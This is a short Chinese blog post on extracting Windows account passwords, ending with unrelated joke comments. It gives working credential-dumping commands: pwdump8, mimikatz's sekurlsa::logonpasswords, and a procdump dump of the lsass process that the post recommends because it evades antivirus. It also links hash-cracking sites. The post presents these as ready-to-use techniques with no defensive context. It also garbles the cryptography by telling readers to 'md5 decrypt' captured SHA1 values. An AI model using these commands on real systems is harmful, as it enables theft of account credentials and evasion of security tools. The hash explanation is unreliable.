Windows下获取账户密码明文技巧

Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系统下hash密码格式用户名称:RID:LM-HASH值:NT-HASH值。
1、利用 pwdump8 获取密码  软件地址:https://www.openwall.com/passwords/windows-pwdump
管理员权限运行cmd,获取加密后的NT-HASH 登陆网站破解
例如:
Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040
用户名称为:Administrator
RID为:500
LM-HASH值为:AF01DF70036EBACFAAD3B435B51404EE
NT-HASH值为:44F077E27F6FEF69E7BD834C7242B040

hash在线破解网站
https://www.objectif-securite.ch/ophcrack
MD5解码网站
https://www.somd5.com/

2、利用 mimikatz 获取明文密码 

privilege::debug
sekurlsa::logonpasswords
获取的SHA1为加密后的密码,该加密字段进行md5解密即可,存在空密码的用户也会抓取到一盒哈希值,将该sha1解密后其实是个空字段

3、利用 procdump & mimikatz 获取密码(推荐 不报毒)
以管理员身份运行cmd,利用procdump导出lsass进程文件

procdump.exe -accepteula -ma lsass

导出结束后,把lsass.dmp文件复制到mimikatz运行目录下,执行以下命令,利用mimikatz读出内容

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords

获取的SHA1为加密后的密码,然后进行md5解密

procdump下载地址
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

mimikatz下载地址
https://github.com/gentilkiwi/mimikatz/releases
发表评论 / Comment

用心评论~

金玉良言 / Appraise
胡几乎LV 1
2020-11-11 08:11
我的法拉利488刚入手一个多星期,总感觉动力不足,没有跑车的那种劲,方向感也不行,找了懂车的内行人看了一下,原来是电池该换了,妈的,送的电池果然不禁用,果断换了南孚。
胡几乎LV 1
2020-11-11 08:10
哈哈哈哈哈哈